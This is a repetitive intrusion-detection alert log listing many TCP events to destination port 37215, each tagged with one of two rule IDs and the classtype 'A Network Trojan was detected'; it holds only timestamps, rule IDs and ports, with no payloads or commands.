                  Timestamp:07/10/24-08:26:28.795318
                  SID:2829579
                  Source Port:36326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.176119
                  SID:2835222
                  Source Port:50842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.035788
                  SID:2829579
                  Source Port:43974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.581630
                  SID:2829579
                  Source Port:58946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.661983
                  SID:2835222
                  Source Port:57352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.595254
                  SID:2829579
                  Source Port:34562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.456007
                  SID:2829579
                  Source Port:35124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.588123
                  SID:2835222
                  Source Port:42058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.543257
                  SID:2835222
                  Source Port:51872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.287324
                  SID:2829579
                  Source Port:49762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.972894
                  SID:2829579
                  Source Port:53462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.140498
                  SID:2829579
                  Source Port:50892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.859417
                  SID:2835222
                  Source Port:45200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761969
                  SID:2835222
                  Source Port:53698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.551619
                  SID:2835222
                  Source Port:41578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.393096
                  SID:2829579
                  Source Port:44612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.233567
                  SID:2829579
                  Source Port:38678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.637197
                  SID:2835222
                  Source Port:60762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771211
                  SID:2829579
                  Source Port:47148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.526771
                  SID:2829579
                  Source Port:34054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.056548
                  SID:2835222
                  Source Port:35072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885160
                  SID:2829579
                  Source Port:58066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.913087
                  SID:2829579
                  Source Port:39340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.301991
                  SID:2829579
                  Source Port:37424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.910396
                  SID:2829579
                  Source Port:47784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.566844
                  SID:2835222
                  Source Port:41106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047210
                  SID:2835222
                  Source Port:57484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.573908
                  SID:2829579
                  Source Port:38558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875221
                  SID:2829579
                  Source Port:36620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838933
                  SID:2829579
                  Source Port:41448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545025
                  SID:2829579
                  Source Port:49240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.565192
                  SID:2829579
                  Source Port:34354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.661764
                  SID:2829579
                  Source Port:33590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.159801
                  SID:2835222
                  Source Port:39890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.787394
                  SID:2835222
                  Source Port:38350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.179823
                  SID:2835222
                  Source Port:57456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.889582
                  SID:2829579
                  Source Port:40242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.552864
                  SID:2835222
                  Source Port:45248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965651
                  SID:2835222
                  Source Port:42412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.130585
                  SID:2829579
                  Source Port:54424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389213
                  SID:2829579
                  Source Port:49500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290878
                  SID:2829579
                  Source Port:40108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.176056
                  SID:2835222
                  Source Port:56112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.969551
                  SID:2835222
                  Source Port:57306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.624284
                  SID:2829579
                  Source Port:35232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433222
                  SID:2835222
                  Source Port:35520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.224175
                  SID:2829579
                  Source Port:39602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.853498
                  SID:2829579
                  Source Port:48852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.983854
                  SID:2829579
                  Source Port:34480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373909
                  SID:2829579
                  Source Port:60148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815716
                  SID:2829579
                  Source Port:39012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.441916
                  SID:2829579
                  Source Port:57596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.421188
                  SID:2835222
                  Source Port:59848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623309
                  SID:2835222
                  Source Port:55912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926953
                  SID:2829579
                  Source Port:45686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596556
                  SID:2829579
                  Source Port:46026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.247004
                  SID:2829579
                  Source Port:54146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.570253
                  SID:2829579
                  Source Port:55542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.327851
                  SID:2835222
                  Source Port:33022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764510
                  SID:2829579
                  Source Port:58530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.259774
                  SID:2829579
                  Source Port:38726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433517
                  SID:2835222
                  Source Port:54968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.603648
                  SID:2829579
                  Source Port:46498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867031
                  SID:2835222
                  Source Port:41044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.013020
                  SID:2835222
                  Source Port:36100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.090396
                  SID:2829579
                  Source Port:38164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.882179
                  SID:2829579
                  Source Port:55676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.553454
                  SID:2835222
                  Source Port:44590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.825440
                  SID:2835222
                  Source Port:40020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.250416
                  SID:2835222
                  Source Port:52346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196325
                  SID:2835222
                  Source Port:37448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.930500
                  SID:2835222
                  Source Port:57524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.535302
                  SID:2835222
                  Source Port:33136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583979
                  SID:2835222
                  Source Port:41520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.952249
                  SID:2829579
                  Source Port:39740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.401812
                  SID:2829579
                  Source Port:51082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.515772
                  SID:2835222
                  Source Port:45438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.208740
                  SID:2835222
                  Source Port:59524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.598533
                  SID:2829579
                  Source Port:36534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.610357
                  SID:2829579
                  Source Port:42288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.200421
                  SID:2829579
                  Source Port:42896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.492673
                  SID:2829579
                  Source Port:44348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.695962
                  SID:2829579
                  Source Port:51166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.434935
                  SID:2829579
                  Source Port:59088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417539
                  SID:2835222
                  Source Port:42556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802852
                  SID:2835222
                  Source Port:36974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433410
                  SID:2835222
                  Source Port:42100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.962924
                  SID:2835222
                  Source Port:41612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322018
                  SID:2835222
                  Source Port:46708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.516492
                  SID:2829579
                  Source Port:54016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.450932
                  SID:2829579
                  Source Port:36296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.865437
                  SID:2829579
                  Source Port:40536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278007
                  SID:2829579
                  Source Port:32920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.766311
                  SID:2835222
                  Source Port:38734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.881994
                  SID:2835222
                  Source Port:39980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.145999
                  SID:2835222
                  Source Port:33890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.829740
                  SID:2835222
                  Source Port:43782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.631188
                  SID:2829579
                  Source Port:54618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.004841
                  SID:2835222
                  Source Port:52212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.510186
                  SID:2835222
                  Source Port:47130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.368496
                  SID:2835222
                  Source Port:46624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.603168
                  SID:2829579
                  Source Port:46382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.918557
                  SID:2829579
                  Source Port:58902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351909
                  SID:2835222
                  Source Port:35878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.237344
                  SID:2829579
                  Source Port:43072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.006056
                  SID:2829579
                  Source Port:39068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.778453
                  SID:2829579
                  Source Port:37058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.842272
                  SID:2829579
                  Source Port:40976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.093940
                  SID:2829579
                  Source Port:50714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.826099
                  SID:2829579
                  Source Port:52146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647061
                  SID:2835222
                  Source Port:43532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.258130
                  SID:2829579
                  Source Port:42432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.136584
                  SID:2829579
                  Source Port:41654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.056548
                  SID:2829579
                  Source Port:34974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.014654
                  SID:2829579
                  Source Port:46568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.480663
                  SID:2835222
                  Source Port:44610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.064971
                  SID:2835222
                  Source Port:60922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652000
                  SID:2829579
                  Source Port:58394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.019376
                  SID:2829579
                  Source Port:46290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.970064
                  SID:2829579
                  Source Port:35320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.173422
                  SID:2835222
                  Source Port:49598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2829579
                  Source Port:51184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.887223
                  SID:2829579
                  Source Port:40724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.078172
                  SID:2829579
                  Source Port:44060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.179798
                  SID:2829579
                  Source Port:57558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.728995
                  SID:2835222
                  Source Port:58766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.513805
                  SID:2829579
                  Source Port:37376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.572595
                  SID:2835222
                  Source Port:36690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.960962
                  SID:2835222
                  Source Port:36498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.113907
                  SID:2835222
                  Source Port:43786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433517
                  SID:2835222
                  Source Port:50008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.923335
                  SID:2835222
                  Source Port:54538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.456007
                  SID:2835222
                  Source Port:55314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.540139
                  SID:2835222
                  Source Port:48694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.463708
                  SID:2835222
                  Source Port:33396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.831621
                  SID:2835222
                  Source Port:55278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.546125
                  SID:2829579
                  Source Port:35588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.455036
                  SID:2835222
                  Source Port:39722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.903843
                  SID:2829579
                  Source Port:32840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347150
                  SID:2835222
                  Source Port:41816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.489365
                  SID:2835222
                  Source Port:40660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505876
                  SID:2829579
                  Source Port:42370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824785
                  SID:2829579
                  Source Port:34816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.590105
                  SID:2829579
                  Source Port:44514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483637
                  SID:2829579
                  Source Port:41060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.406551
                  SID:2835222
                  Source Port:51046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002898
                  SID:2835222
                  Source Port:47096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824276
                  SID:2829579
                  Source Port:60084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.588104
                  SID:2835222
                  Source Port:42464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.924312
                  SID:2829579
                  Source Port:44912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202675
                  SID:2829579
                  Source Port:49374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.084191
                  SID:2829579
                  Source Port:43494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.056369
                  SID:2829579
                  Source Port:44868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.093550
                  SID:2835222
                  Source Port:49300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.467036
                  SID:2829579
                  Source Port:40016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630697
                  SID:2835222
                  Source Port:33396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.521330
                  SID:2835222
                  Source Port:43772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.775037
                  SID:2835222
                  Source Port:39300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.359612
                  SID:2829579
                  Source Port:38870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.085060
                  SID:2835222
                  Source Port:46404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.854453
                  SID:2835222
                  Source Port:45384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.111831
                  SID:2835222
                  Source Port:37100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.986836
                  SID:2829579
                  Source Port:60968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.150290
                  SID:2829579
                  Source Port:55792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.757410
                  SID:2835222
                  Source Port:39426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.279611
                  SID:2829579
                  Source Port:53008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.126416
                  SID:2829579
                  Source Port:57132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.947291
                  SID:2835222
                  Source Port:43918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523012
                  SID:2829579
                  Source Port:36410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.476444
                  SID:2829579
                  Source Port:57424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.024076
                  SID:2829579
                  Source Port:35460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981356
                  SID:2829579
                  Source Port:46100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926905
                  SID:2835222
                  Source Port:60042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.166168
                  SID:2835222
                  Source Port:47936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.878263
                  SID:2829579
                  Source Port:33962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.185610
                  SID:2835222
                  Source Port:41418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.867801
                  SID:2835222
                  Source Port:52740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.530695
                  SID:2829579
                  Source Port:45388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.896247
                  SID:2835222
                  Source Port:38268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171855
                  SID:2829579
                  Source Port:38112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864679
                  SID:2829579
                  Source Port:36682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.899646
                  SID:2835222
                  Source Port:39516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.817162
                  SID:2829579
                  Source Port:38068
                  Destination Port:37215
                  Protocol:TCP
